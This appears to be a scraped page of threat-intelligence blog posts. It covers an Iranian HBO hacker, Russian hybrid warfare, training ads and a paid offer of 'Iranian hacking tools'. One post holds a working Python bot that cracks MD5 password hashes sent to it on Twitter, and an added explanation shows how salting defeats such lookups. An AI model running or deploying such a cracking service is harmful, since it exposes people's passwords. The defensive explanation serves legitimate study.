10. python tinfoleak.py -n (Username) -g nicholasstoller.kml -o output.log
***OSINT-Twitter-Tinfoleak***


Twitter Brute Force – Iranian hack

Iranian password cracking for twitter – within the last 72 hours

 

#!/usr/bin/env python
###################################
# Password cracking twitter V 1.0 #
# #
# : # # #
###################################
# Python 2 script using python-twitter: it watches the account's mentions for a
# 32-character MD5 hash, looks the hash up in a CrackStation lookup table and
# replies with the result.

import os
import time
import twitter
import json
import random
from datetime import datetime
from hashlookup.LookupTable import LookupTable

# Twitter API credentials (left empty in the post)
CONSUMER_KEY = ""
CONSUMER_SECRET = ""
ACCESS_TOKEN_KEY = ""
ACCESS_TOKEN_SECRET = ""

POLL = 60  # seconds between polls of the mentions timeline
WORDLIST = './crackstation-dist/crackstation.txt'

# ANSI colour codes for console output
W = "\033[0m"   # default/white
R = "\033[31m"  # red
P = "\033[35m"  # purple
C = "\033[36m"  # cyan
bold = "\033[1m"

INFO = bold + C + "[*] " + W
WARN = bold + R + "[!] " + W
MONEY = bold + P + "[$] " + W
TIME = lambda: str(datetime.now()).split(' ')[1].split('.')[0]

print INFO+"%s: Logging into Twitter API ..." % TIME()
api = twitter.Api(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET, access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET)

# Precomputed index file for each supported hash algorithm
indexes = {
    'md5': './crackstation-dist/crackstation-md5.idx',
}

# IDs of mentions already answered, kept across runs (stored as JSON)
if os.path.exists('processed.pkl'):
    with open('processed.pkl', 'r') as fp:
        processed = json.loads(fp.read())
    print INFO+"%s: Loaded %d processed IDs" % (TIME(), len(processed))
else:
    processed = []


def crack_hashes(algorithm, hashes):
    # Look the hash(es) up in the precomputed table for this algorithm
    results = []
    if 0 < len(hashes):
        lookup_table = LookupTable(
            algorithm=algorithm,
            index_file=indexes[algorithm],
            wordlist_file=WORDLIST,
        )
        results = lookup_table[hashes]
    return results


def process_request(mention):
    # Any 32-character word in the tweet is treated as a candidate MD5 hash
    hashes = filter(lambda word: len(word) == 32, mention.text.split(' '))
    if len(hashes):
        print INFO+"%s: Candidate hashes: %s" % (TIME(), hashes)
        results = crack_hashes('md5', hashes[0])  # Limit one hash atm
        if results[hashes[0]] is not None:
            message = "@%s I cracked your hash, the password is '%s'" % (
                mention.user.screen_name, results[hashes[0]]
            )
        else:
            message = "Sorry @%s but I couldn't crack that hash :(" % mention.user.screen_name
    else:
        print WARN+"%s: No hashes found in request." % TIME()
        message = None
    if message:
        print INFO + "%s: Posting update \"%s\"" % (TIME(), message)
        # Random suffix so repeated replies are not identical
        message += " (%d)" % random.randint(0, 9999)
        api.PostUpdate(message)


def poll_twitter():
    mentions = filter(lambda m: m.id not in processed, api.GetMentions())
    print INFO + "%s: %d new mention(s) to process" % (TIME(), len(mentions))
    for mention in mentions:
        process_request(mention)
        processed.append(int(mention.id))


def run_forever():
    while True:
        time.sleep(POLL)
        print INFO + "%s: Polling twitter API ..." % TIME()
        try:
            poll_twitter()
        except twitter.TwitterError as error:
            print WARN+"%s: Error from API %s, sleeping for 5mins" % (TIME(), str(error))
            time.sleep(300)  # the original logged the 5-minute back-off but never slept


if __name__ == '__main__':
    try:
        run_forever()
    except KeyboardInterrupt:
        # Persist the processed mention IDs on Ctrl-C
        with open('processed.pkl', 'wb') as fp:
            fp.write("%s" % json.dumps(processed))
        print INFO+"%s: Saved processed to processed.pkl" % TIME()

 

und3rgr0und
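
The script above answers from a precomputed index over a wordlist, which is why an unsalted MD5 of any dictionary password gives no protection once the hash leaks. The following is an added example, not part of the original post and not the hashlookup library's code: it builds a small index of that kind over a constructed wordlist, then shows that a per-password salt makes the lookup miss and how a salted PBKDF2 record is stored and verified. The index layout, the function names and the wordlist are assumptions made for illustration.

```python
import hashlib
import hmac
import os
from bisect import bisect_left

# Constructed sample wordlist (stand-in for a large dictionary file).
WORDLIST = b"password\nletmein\nqwerty123\nsummer2017\ndragon\n"

PREFIX_LEN = 8  # bytes of each MD5 digest kept in the index (assumed layout)


def build_index(wordlist):
    """Return a sorted list of (digest_prefix, offset) pairs.

    Each entry maps the first PREFIX_LEN bytes of md5(word) to the byte offset
    of that word in the wordlist, so the plaintext is read back on a hit.
    """
    index = []
    offset = 0
    for line in wordlist.splitlines(keepends=True):
        word = line.rstrip(b"\n")
        if word:
            index.append((hashlib.md5(word).digest()[:PREFIX_LEN], offset))
        offset += len(line)
    index.sort()
    return index


def lookup(index, wordlist, hex_digest):
    """Binary-search the index and confirm any prefix match on the full digest."""
    try:
        target = bytes.fromhex(hex_digest)
    except ValueError:
        return None          # not hexadecimal at all
    if len(target) != 16:
        return None          # not an MD5-sized digest
    prefix = target[:PREFIX_LEN]
    i = bisect_left(index, (prefix, 0))
    while i < len(index) and index[i][0] == prefix:
        start = index[i][1]
        end = wordlist.find(b"\n", start)
        word = wordlist[start:end if end != -1 else len(wordlist)]
        if hashlib.md5(word).digest() == target:
            return word.decode()
        i += 1
    return None


def store_password(password, iterations=200_000):
    """Defender side: random per-password salt plus a slow KDF."""
    salt = os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, derived


def verify_password(password, record):
    """Recompute with the stored salt and compare in constant time."""
    salt, iterations, derived = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, derived)


def demo():
    """Same password twice: unsalted MD5 is found, salted MD5 is not."""
    index = build_index(WORDLIST)
    unsalted = hashlib.md5(b"summer2017").hexdigest()
    salted = hashlib.md5(os.urandom(16) + b"summer2017").hexdigest()
    return lookup(index, WORDLIST, unsalted), lookup(index, WORDLIST, salted)


if __name__ == "__main__":
    found, missed = demo()
    print("unsalted MD5 lookup:", found)
    print("salted MD5 lookup:  ", missed)
    record = store_password("summer2017")
    print("PBKDF2 verify:", verify_password("summer2017", record))
```

The salt only defeats precomputation; the iteration count is what slows down a per-hash dictionary run, so both belong in the stored record.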


Behzad Mesri – #HBO Hack – Silent Terror

Of course, my main question, ever since I first came to know this defacer, was why his name is missing an "o":
skote vahshat

BehzadMasri – skote_vahshat Get the scoop here (PDF)

Behzad Mesri

I think he misspelled it at first, that spelling became the famous one, and he was too embarrassed to change it.

Wired Article
Anyway, I hope his life is not ruined, but I wish the authorities would answer this question too.

You have probably seen the logs, pastes and databases that are traded on underground forums.
No security or privacy is left, and government and security agencies are certainly among the customers for these, or are even the ones behind the leaks.
It is not that surprising that someone's identity gets exposed this way…
In fact it really is not very hard; something similar can be done even with a personal computer, and the government has a far freer hand.

Someone who commits a major cybercrime and is not exposed, or is exposed but never found, is really good at what they do…
It is genuinely hard… They constantly have to look at the matter from the point of view of whoever is trying to find them, and that is more important, and perhaps harder, than the act they commit.

Skote Vahshat

📌 Additional information about Behzad Mesri and the HBO hack

🔹 The cyberattack was discovered while Time Warner, HBO's parent company, was being acquired by AT&T for 85 billion dollars. The discovery drove HBO's shares down.

‼️ Mesri apparently also stole the scripts of unproduced episodes of HBO series.

🔹 Mesri's record includes hacking Israel's nuclear energy infrastructure.

🔹 The 7 charges against Mesri include "computer crimes", "financial crimes", "extortion", "identity theft" and other offences. US authorities believe he currently resides in Iran.

🔹 The email Mesri sent to the hacking victims included the following phrase:

“Hi to All losers! Yes it’s true! HBO is hacked!”

🔹 Under the alias Skote Vahshat, Mesri has registered at least ten SQL Injection exploits and defaced dozens of sites.

🔹 According to Mesri's own claim, he stole more than 1.5 terabytes of data.

🔴 The hacker group OurMine took control of HBO's Twitter account in the month of Shahrivar (August/September). It appears that the password for this account was passed to them by Mesri.

🔴 One reason Mesri was charged so quickly was his attempt to contact numerous reporters and media outlets in order to pressure HBO into paying the extortion demand.

🔹 Mesri's first step was to find the employees' remote access to the HBO network, so that he could maintain his access to the infrastructure through that same channel.


2018 Cyber Intelligence – Cyber CounterIntelligence Training HOLIDAY2018 Discounts available through December 8

Why Treadstone 71:

January 8-12 Cyber Intelligence- Amsterdam, NL
February 5-9 Cyber Intelligence- Reston, VA
March 19-23 Cyber Intelligence- Columbia, Maryland
April 9-13 Cyber Intelligence- London, UK
April 30 – May 3 Cyber Intelligence – Los Angeles California
May 14-18 Cyber Intelligence- San Jose, CA
June 18-22 Cyber Intelligence- Annapolis Junction, Maryland
Aug 13-17 Cyber Intelligence- Reston, VA
Sep 17-21 – Cyber Intelligence- Boston, MA
Oct 15-19 Cyber Counter Intelligence – Reston, VA
Nov 5-9 Cyber Intelligence- Denver, CO
Dec 3-7 Cyber Counter Intelligence – Columbia, Maryland

ENTER HOLIDAY2018 during registration as a Coupon Code for Black Friday Discounts of Lowest Price Ever!! 2460Euro 2200GBP 2900USD Price – Available for 15 days. (Offer ends December 8 – Limited Seats available at this price)

– T71 has been teaching this course for 9 years, building a common body of knowledge (and a capability maturity model for cyber intel)

– We follow intelligence community standards such as those taught at the Sherman Kent School

– All courses include case studies taken directly from today’s adversarial campaigns

– All intelligence community standards are applied to cyber threat intelligence

– T71 teaches both public and private courses

– T71 also has supported multiple companies from the US, AU, and EU build their cyber threat intelligence strategies, hiring, and programs

– T71 has assisted multiple companies to select and implement threat intelligence platforms

– We apply what we have learned in our client engagements

(Benefits list – Take the course)

– Your instructor is not cemented in forensics – we are intel

– T71 is active on adversary platforms, performing targeted research that uses and validates the methods taught in the classroom

– Students attending T71 classes not only absorb classroom instruction, but they serve a 1-week apprenticeship using the concepts, TTPs, and methods taught in the class in hands-on case studies

– T71 courses result in 40 CPEs and an industry-validated certification providing the foundational aspects to execute cyber intelligence collection and analysis while preparing for the next phase of cyber threat intelligence operations

– You know it is the right thing to do since no one else is solely focused on applied teaching methods where the student walks away feeling a certain level of skill and accomplishment.

– Although contrary to course licensing and legal requirements, many ‘threat intel and research intel’ commercial firms are using the Treadstone 71 course content and methodology in their programs, services, and even in their threat intelligence platforms

See T71 Intel Training to Register for early discounts

Zapad Exercises – 2nd/3rd Order Effects

The recent Russian Zapad wargaming exercises included a plethora of electronic capability demonstrations and potentially more. Russia is known to have recently been involved in illegal immigration efforts in Sweden, Finland, and Norway along with hostile intent along its northern borders (Estonia, Latvia, Lithuania) including cell/communication tower tampering. Could the recent Zapad exercises be more than just wargaming?

Some What If thoughts on these non-linear actions:

– Testing capabilities, distance, strength, impacts
– Testing responses like a stone in pond
    – 2nd and 3rd order effects were measured to determine the impact on targets, targets responses, etc.
    – Russians had people in each target country assisting with target impacts
    – Russians monitored target government communications from within each country
    – Determine length of time for target government to respond and what methods were used and where to get communications back online (if at all) – the locations of the response represent capabilities unknown to Russia until such an exercise is performed
– Other possibles:
    – A cover for illegal activities that occurred during the exercise – a feint, a ruse
    – Testing a precursor to actual execution – that is why military exercises are performed
    – What capabilities are being left in the exercise areas; what is not being removed after the exercise using the exercise as a ruse to place assets close to Western borders that were not there before

What do you think?

https://uawire.org/news/media-belarusian-and-russian-militaries-are-jamming-mobile-communications-along-border-with-poland

Drone Wars! Threats, Vulnerabilities and Hostile Use


Treadstone 71 on I24News Live with David Shuster – 9/28/2017

  • Hybrid warfare – conventional, irregular, terrorist, criminal
  • Non-linear warfare includes those plus cyber, information, economic, diplomatic, political, cultural, religious, and social means

  • Subvert the enemy’s social and political structure – political and social agitation, remove confidence in a system, sow seeds of discontent, pit brother against brother = create confusion and dissent. – Used to confuse, lie, misrepresent, destabilize, and erode the current social order, the current political order
  • It can easily be said that social engineering is the exploitation of human behavior and trust.
  • Propaganda that fits my beliefs and further accentuates the ‘truth’ although false, in that belief
  • We plan… They plot. We are clever… They are sneaky. We form strategies… They conspire. We have convictions… They are fanatics.
  • The overwhelming preponderance of people have not freely decided what to believe, but, rather, have been socially conditioned (indoctrinated) into their beliefs.
  • Their thinking is largely comprised of stereotypes, caricatures, oversimplifications, sweeping generalizations, illusions, delusions, or self-serving rationalizations.
  • They see the world through ethnocentric and nationalistic eyes.
  • They stereotype people from other cultures.
  • They resent being “corrected,” disagreed with, or criticized. They want to be re-enforced, flattered and made to feel important.
  • We have a deep-seated sense of duty to authority- adults will do extreme things when instructed to do so by an authority figure
  • Social Validation (Consensus) – the behavior/opinions of similar others

Valery Vasilevich Gerasimov – Валерий Васильевич Герасимов

Chief of the General Staff of the Armed Forces of the Russian Federation / First Deputy Minister of Defence of the Russian Federation, General of the Army.

Валерий Васильевич Герасимов

Born 8 September 1955 (age 62)

Kazan, Tatar Autonomous Soviet Socialist Republic

Married – one son

Russian hackers reportedly stole NSA data via Kaspersky Lab software

http://algo.fyi/5vhjug

Born on 8 September 1955 in the city of Kazan. In 1977, he graduated from the Kazan Higher Tank Command School named after the Presidium of the Supreme Soviet of the Tatar ASSR (Autonomous Soviet Socialist Republic). He commanded platoon, company, battalion in the Northern Group of Troops and Far Eastern Military District.

After his graduation from the Military Academy of Armored Troops named after Marshal of the Soviet Union R.Ya. Malinovsky in the year of 1987, he served as the chief of headquarters and commander of tank regiment, the chief of headquarters of motorized rifle division in the Baltic Military District. From 1993 to 1995 — the commander of motorized rifle division in the North-Western Group of Troops.

After graduating from the Kazan Higher Tank Command School Gerasimov was the commander of a platoon, company, and battalion of the Far Eastern Military District. Later he was chief of staff of a tank regiment and then of a motorized rifle division in the Baltic Military District. From 1993 to 1995 he was the commander of the 144th Guards Motor Rifle Division in the Baltic Military District and then the North-Western Group of Forces.

After he graduated from the General Staff’s academy he was First Deputy Army Commander in the Moscow Military District and commander of the 58th Army in the North Caucasus Military District during the Second Chechen War. His involvement in the arrest of Yuri Budanov led to praise from journalist Anna Politkovskaya.

In 2006, he became commander of Leningrad Military District and moved to be the commander of Moscow Military District in 2009 and Central Military District in April 2012. On 23 December 2010, he became deputy Chief of the General Staff.

In 1997 after his graduation from the Military Academy of the RF Armed Forces’ General Staff, he served as the First Deputy Commander of Army in the Moscow Military District, the Deputy Commander, Chief of Staff and Commander of the 58th Army in the North Caucasian Military District.

From 2003 to 2005 — the Chief of Staff of the Far Eastern Military District. From 2005 — the Chief of the Main Administration of Combat Training and Troops’ Service of the RF Armed Forces, and from December 2006 — the Chief of Staff of the North Caucasian Military District.

In December 2006, he was assigned as the Commander of the Leningrad Military District, and in February 2009 — as the Commander of the Moscow Military District.

From December 2010 — the Deputy Chief of the General Staff of the Armed Forces of the Russian Federation.

From 26 April 2012 — the Commander of the Central Military District.

By the RF Presidential Decree of 9 November 2012, he has been appointed the Chief of the General Staff of the Armed Forces of the Russian Federation / First Deputy Minister of Defence of the Russian Federation. He was appointed by President Vladimir Putin on 9 November 2012. Some authors credit Gerasimov as the person behind a so-called “Gerasimov doctrine” – currently prevalent in Russian military strategy – combining military, technological, information, diplomatic, economic, cultural and other tactics, which are then deployed towards one set of strategic objectives. This “political warfare” is preferred due to its comparatively low cost.

The previous Chief of General Staff, Army General Nikolay Makarov, was seen as close to Serdyukov and was seen by commentators as likely to be replaced by new Defence Minister Sergey Shoygu. It has been reported that Makarov resigned, but he was formally dismissed by President Vladimir Putin. Other changes were the dismissal of Alexander Sukhorukov from the position of First Deputy Defence Minister and his replacement by Colonel General Arkady Bakhin, formerly commander of the Western Military District. Aerospace Defence Forces commander Colonel General Oleg Ostapenko was also promoted to Deputy Defence Minister. He was promoted to the highest rank in the Russian Army, General of the Army as of 2014. On September 15, 2016, he and Turkish chief of staff General Hulusi Akar conducted a meeting on the future of Syria in the Ankara headquarters of the army. That meeting will result in tightened dealings between Russia and Turkey.

There is an old Soviet-era rhetorical device that a ‘warning’ or a ‘lesson’ from some other situation is used to outline intent and plan. The way that what purports to be an after-action take on the Arab Spring so closely maps across to what was done in Ukraine is striking. Presenting the Arab Spring–wrongly–as the results of covert Western operations allows Gerasimov the freedom to talk about what he may also want to talk about: how Russia can subvert and destroy states without direct, overt and large-scale military intervention. However, the assumption that this is a Western gambit primarily does appear genuinely-held. https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/

In April 2014 Gerasimov was added to the list of persons against whom the European Union introduced sanctions “in respect of actions undermining or threatening the territorial integrity, sovereignty, and independence of Ukraine.”

Hero of the Russian Federation.

Personal decorations: Order for Military Merits, Order for Merits to the Fatherland 4th grade, Order for Service to the Homeland in the USSR’s Armed Forces 3rd grade, Order of St. George 4th grade, Order for Merits to the Fatherland with Swords 3rd grade, Order for Honor.

The role of nonmilitary means of achieving political and strategic goals has grown, and, in many cases, they have exceeded the power of force of weapons in their effectiveness.

For me, this is probably the most important line in the whole piece, so allow me to repeat it: The role of nonmilitary means of achieving political and strategic goals has grown, and, in many cases, they have exceeded the power of force of weapons in their effectiveness. In other words, this is an explicit recognition not only that all conflicts are actually means to political ends–the actual forces used are irrelevant–but that in the modern realities, Russia must look to non-military instruments increasingly. https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/

https://warontherocks.com/2016/03/russian-hybrid-warfare-and-other-dark-arts/


Hard nosed open source collection and analysis

Syrian violations of sanctions with Russian FSB assistance to manufacture ballistic vests – Not discovered by any organization other than Treadstone 71 – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2017/09/16/bulletproof/

Russian malware tied to BlackEnergy / Dragonfly embedded in PLC software at Delta Electronics Taiwan – before Symantec and all the large ‘cybersecurity’ firms – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2017/09/06/dragonflydelta/

Iranian hackers and their solutions penetrating Saudi companies – Alfa-Shell / solevisible – Identified 10 months ago 12/2016 long before FireEye – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2016/12/30/solevisible/

How much are you paying for your generic data feed?

Wired
Treadstone 71 – We See What Others Cannot

Dru’a al-Waaqiah lil-Bedoon – Syrian Sanctions Busting with Russian Help

Past report on Syrian Government collusion with Russia to bypass sanctions against Syria. This instance involves acquiring materials and machines to manufacture their own body armor in Latakia by way of the UAE, where a Syrian soldier working with a female FSB agent centralizes the acquisitions.

Visas, passports, military IDs, fake names, bills of lading and more for your reading and review.

The Treadstone 71 Report (pdf) – Treadstone 71 – drua-alwaaqiah-lilboodoon

Treadstone 71 acquired supporting files and documents (30MB zip) – drua-rawfiles-treadstone71

https://treadstone71llc.files.wordpress.com/2014/10/hatem-deeb-_-vk.pdf 

https://treadstone71llc.files.wordpress.com/2014/10/zain-deeb-_-vk.pdf

https://cybershafarat.com/?p=524

http://www.treadstone71.com

Treadstone 71 Announces Cyber Intelligence Capability Maturity Model

Treadstone 71 developed a maturity model to help organizations determine the maturity of their cyber intelligence initiatives against the cyber intelligence common body of knowledge (CICBOK). The model provides strategic and operational aspects of your cyber intelligence maturity, where it needs to go, and where you should concentrate your attention to create more value for your business. Nearly 8 years in the making, the Treadstone 71 Cyber Intelligence Maturity Model uses traditional tradecraft as delivered by Sherman Kent and Richards Heuer, intelligence community standards, analytic standards, and experiential knowledge derived from years of training, assessing, and building cyber intelligence programs.

The Treadstone 71 Cyber Intelligence Capability Maturity Model (T71-CICMM) is a methodology used to develop and refine an organization’s cyber intelligence program. The model not only provides education and practical skills for learning and developing expertise, but also serves as a roadmap for building a cyber intelligence program. More information is available here:

Treadstone 71 Cyber Intelligence Maturity Model

Status – Iranian Hacking Tools

Iranian Hacking Tools

One time, 24-hour access to download the as-is Iranian Hacking tools. Approximately 1.3GB of use-at-your-own-risk tools, videos, instructions, and other information.

$4,950.00

Many have requested access to the gigabytes of Iranian hacking tools Treadstone 71 has available. You may now access these tools via a payment to Treadstone 71.

Best Regards,

Treadstone 71

It has not changed – Russian Maskirovka – Denial and Deception

I keep a vigil in a wilderness of mirrors
Where nothing here is ever what it seems

Yuri Nosenko

“Instead of being relieved to hear that the Soviets had not been involved in the assassination, James Jesus Angleton, the C.I.A.’s legendarily suspicious counterintelligence chief, and others in the spy trade thought Mr. Nosenko’s apparent defection was a trick.”

http://www.planetreg.com/T71IntelTraining including Cyber Counterintelligence Tradecraft 

“After all, the agency had suffered a series of setbacks, including the unmasking and execution of two Russian intelligence officials who had been spying for the C.I.A. inside the Soviet Union.”

Not much has changed with respect to Russian counterintelligence activities but for the medium of use. The Internet affords great opportunities for denial and deception, counterdenial and counterdeception, ruses, feints, doubleplays, and other methods of manipulation and influence management. Want to learn more? Try Treadstone 71’s Cyber Counterintelligence Tradecraft Certification – http://www.planetreg.com/T71IntelTraining

http://www.washingtonpost.com/wp-dyn/content/article/2008/08/26/AR2008082603493.html

http://mcadams.posc.mu.edu/russ/jfkinfo/jfk8/hscanpol.htm

Intelligence for the C-Suite and Stakeholders

This is a one-day course designed to educate corporate leadership and stakeholders in cyber and threat intelligence. There is a general awareness of the need to establish intelligence functions. Many organizations do not have a fundamental understanding of what intelligence is, where the function should reside, or how it differs from business and competitive intelligence, including the overlaps and natural points of integration. This one-day course targets corporate leadership, delivering clear and coherent training that equips stakeholders with the understanding and tools they need to assist in building a successful intelligence program.


Registration Information – Dates and Times TBD

Course High-Level Outline

  • Using Strategic Intelligence
  • Organization and Focus of the Class
  • Background on Strategic Intelligence and Analysis
  • Approaches and Processes
  • Strategic Plan development, acceptance, and dissemination
    • Mission
    • Vision
    • Guiding Principles
    • Roles and Responsibilities
    • Threat Intelligence Perspective
    • Business Intelligence Perspective
    • Competitive Intelligence Perspective
    • Intelligence Strategic Challenges
    • Goals and Initiatives
    • Next Steps
    • Roadmap
  • Stakeholder checklist and stakeholder management groups with strategic and tactical activities definition for intelligence, description of needs and products. This will include:
  • The Future Use of Strategic Intelligence
  • Intelligence: Role, Definitions, and Concepts
  • Basic Concepts Concerning Intelligence
  • The Strategic Intelligence Process – Operations to Tactics
  • The Role of Strategic Intelligence and Its Impact on Stakeholders
    • Operational, Technical, Tactical
  • Why Stakeholders and Executives Need Strategic Analysis:
  • Strategic Analysis Leading to Strategic Decisions
  • Implementing Intelligence Programs
    • The Treadstone 71 Method (Experience with several program builds globally)
  • Challenges for Stakeholders to Accept Intelligence
  • Stakeholder Views: Impact on Intelligence
  • Intelligence as Catalyst for Stakeholders
  • Integrating Analytical Support and the Stakeholder Thought Process
  • Stakeholders and Self-Directed Strategic Processes, Procedures, Methods
  • The Role of Intelligence Management
  • Issues, Tactics, Techniques, Methods, and Principles
  • Managing Intelligence Projects
  • Providing Focused Leadership
    • Leading the Team
    • Understanding Issues and the Process
    • Analysis Overview
    • Collection Management
    • Production Management
      • Evaluation
      • Analysis
      • Integration
      • Interpretation
    • Types of Analysis
      • 14 Types of Analysis
    • Analytic Writing
      • ICD 203, 206, 208
      • Organization, Evidence, Argument, Sources, Pitfalls
      • Use the Title
      • Who/What, Why Now, So What, Impact so far, Outlook, Implications
      • BLUF and AIMS
      • Supervisory Actions
      • Summary Paragraphs
      • Alternative Analysis
      • Clarity and Brevity
      • Peer review
      • Reports and Reporting
        • Feedback
    • Pre-Mortem
    • Post-Mortem
    • Know your professor, get an A – Communicating Up
      • Relevance, Timeliness, Completeness, Accuracy, Usability
    • Briefing Rules
  • Intelligence Analysts and Self-Management
    • High-Level Tasks
  • Analyst Activities
    • Rules for developing analysts – Alignment and as collectors
    • The Role, Responsibilities, and Functions of the Analyst
    • The Analyst’s Roles and Responsibilities – RACI(s)
    • What the Analyst will face
    • Job Descriptions
  • Conclusion
    • The Executive / Stakeholder’s Roadmap
Corporate stakeholders risk investing large amounts of time and money with little positive effect on their security, corporate strategies, and business direction. Participation by the C-Suite and stakeholders in this course ensures their understanding of the discipline required to build a successful program. The course helps align information security, incident response, security operations, threat and cyber intelligence with the business.
Featured post

Training Report – Treadstone 71 Cyber Intelligence Tradecraft Professional Certification

“This past week, I had the absolute pleasure of attending the 5-day Treadstone 71 Cyber Intelligence Tradecraft Professional Certification course along with three of my colleagues. Mr. Jeff Bardin was the instructor and his knowledge and depth in this area is exceptionally impressive!

The training allows students to gain a better understanding of the cyber intelligence life cycle, the role and value of cyber intelligence relative to online targeting and collection, in modern organizations, businesses, and governments at the completion of this course. In addition, students understand: the methods of online anonymity, the fundamentals behind cyber intelligence collection and analysis, and how these current methods can be employed in our organizations to assist in online operational security and in defense against adversaries. The course was a combination of lecture, hands-on and student deliverables seen by many as an apprenticeship. We completed 4 case studies throughout the week in varying subjects such as Iranian hackers, high financial networks, Russian SCADA equipment, etc.

I would highly recommend this course to anyone looking to further their knowledge in the cyber area.  It will also allow you to become a better intelligence analyst, as a whole.  Overall, it was a truly fantastic learning experience that is applicable in both our personal, as well as professional lives.  I most certainly have a new appreciation for online security and safety.” – Recently certified student February 2017

Featured post

Suggested Reads by Iranian Hackers

https://www.cs.utexas.edu/~jason777/Programming/Connect Four/Connect Four/Project/2011 – Assembly Language for x86 Processors 6e (Prentice Hall).pdf

http://profmsaeed.org/wp-content/uploads/2015/02/IntelAsseblyLanguage.pdf

staff.ustc.edu.cn/~sycheng/ssat/books/The.IDA.Pro.Book.2ed.pdf

http://www.foo.be/cours/dess-20122013/b/Eldad_Eilam-Reversing__Secrets_of_Reverse_Engineering-Wiley(2005).pdf

http://www.chinastor.org/upload/2015-08/15081917086229.pdf

https://doc.lagout.org/network/2_Hack/Reverse Engineering of Object Oriented Code.pdf

https://download.adamas.ai/dlbase/ebooks/VX_related/Identifying Malicious Code Through Reverse Engineering.pdf

http://www.staroceans.org/kernel-and-driver/Assembly Language Step-By-Step – Programming with Linux, 3rd edition (Wiley, 2009, 0470497025).pdf

coolfire.insomnia247.nl/Hacker Disassembling Uncovered.pdf

Featured post

2017 Training Courses – Treadstone 71

2017 Training Dates

Main Page to Treadstone 71 Training – 2017

(or on demand including in-house or by location)

Treadstone 71 is working with FS-ISAC for training in London, Singapore, Malaysia, and Australia.

FS-ISAC Sponsored Courses:

  • Cyber Intelligence Tradecraft Training: 3-7 April | Reston, VA
  • Cyber Intelligence Tradecraft Training: 8-12 May | London
  • Cyber Intelligence Tradecraft Training: 19-23 June | Reston, VA
  • Cyber Intelligence Tradecraft Training: 21-25 August | Reston, VA

Featured post

Full Suite of Cyber-Threat Intelligence and Counterintelligence Courses Ready for Global Delivery

Treadstone 71 today announced a full suite of Cyber and Threat Intelligence and CounterIntelligence training courses. The courses drive the expansion of Treadstone 71’s accelerated, academically validated, intelligence training to global markets. Treadstone 71 delivers courses in California, Virginia, Canada, the United Kingdom, and the Netherlands and is set to expand to the Middle East and Asia later this year. (www.planetreg.com/T71IntelTraining)

Treadstone 71 offers a compelling business model that delivers rapid cyber and threat intelligence strategic planning, program build, and targeted training in sectors such as financial services, government, healthcare, energy, and other critical infrastructure verticals. Treadstone 71’s format, curriculum, and instruction model are helping meet critical global demand for cyber and threat intelligence and analysis expertise. Treadstone 71 training provides graduates with an attractive pathway to compensation increases, career progression, and much-needed attention to intelligence. The organization has been teaching cyber intelligence at the Master’s level and commercially for seven years. New courses include a focus on campaign management, the use of Tor, Tails, I2P, and Maltego as well as covering persona development and management. Students create a series of identities, character development, and dimensions, storyline, plot synopsis, story drive and limit, story weaving, applicability, scope, tools to be used, methods of interaction with other identities, engaging secondary characters, refining targeting while developing a campaign to gain street credentials.

“Our courses provide academic instruction combined with real-world, hands-on collection, analysis, analytic writing, dissemination, and briefings that many liken to an apprenticeship,” said Jeff Bardin, Chief Intelligence Officer for Treadstone 71. “Our curriculum follows the teachings of Sherman Kent and Richards Heuer giving students the tools necessary to perform targeted collection, structured analysis while authoring reports modeled after intelligence community standards. We teach methods of cyber infiltration, information and influence operations, counterintelligence strategies, mission based counterintelligence, denial and deception, and counter-denial and deception.”

Treadstone 71 courses are validated and proven by intelligence professionals creating job-ready threat intelligence professionals for global organizations suffering a talent shortage. “Intelligence analysis is an inherently intellectual activity that requires knowledge, judgment, and a degree of intuition,” continued Bardin. “Treadstone 71’s intelligence, counterintelligence, and clandestine cyber HUMINT training and services help organizations transform information into intelligence pertinent to their organization.”

Analysis includes integrating, evaluating, and analyzing all available data, which is often fragmented and even contradictory, and preparing intelligence products. Despite all the attention focused on the operational (collection) side of intelligence, analysis is the core of the process to inform corporate stakeholders. Analysis is more than just describing what is happening and why; identifying a range of opportunities… Intelligence analysis is the key to making sense of the data and finding opportunities to take action. Analysis expands beyond the technical focus of today, providing organizations with core capabilities for business, competitive, cyber, and threat intelligence.

Treadstone 71’s Cyber Intelligence Tradecraft Certification is the gold standard in the industry today derived from both academia and from Treadstone 71’s experience in building cyber intelligence programs at Fortune 500 organizations worldwide.

Treadstone 71

888.714.0071 – osint@treadstone71.com – http://www.planetreg.com/T71IntelTraining

Featured post

We Are in a State of Cyber Cold War?

Wisdom begins with the definition of terms – Socrates

Many believe that we are not in some sort of state of cyber warfare. Many believe that it is only influence operations. These are the same people who are selling you security technologies and services to protect your environment. They believe calling our current state cyber war is hype. The fact that they believe this is demonstrated in their technologies that have double and triple downed on solutions that do not work. Solutions based solely on see, detect, and arrest. A paradigm proven over the past 20 years to be a paradigm of failure. The game of many a vendor (not all) is to generate revenue off your fear. A fear that can be remedied if we fix information security by first starting to fix information technology (see Cyber Security Predictions – Not Reality TV – Just Daytime Entertainment). One of the problems we have is standard taxonomy and glossary. Most do not have an understanding of the basics of intelligence and war. Most feel the need to apply physical characteristics to cyber actions in order for those actions to be taken as some sort of warfare. This is a major misnomer. My request here is for you to read the limited glossary items below. Once you have read these items, think of where we are today with respect to cyber security. If after reading and applying critical thinking to the terms and our current state of cyber security you do not believe we are in a state of cyber cold war, then provide some well thought out comments as to what state we are in fact in.

Information Operations (IO). The integrated employment of the core capabilities of electronic warfare, computer network operations, psychological operations, military deception, and operations security, in concert with specified supporting and related capabilities, to influence, disrupt, corrupt or usurp adversarial human and automated decision making while protecting our own. (JP 1-02)

This includes five core capabilities incorporated into IO:

  1. Electronic warfare is any action involving the use of the electromagnetic spectrum or directed energy to control the spectrum, attack of an enemy, or impede enemy assaults via the spectrum.
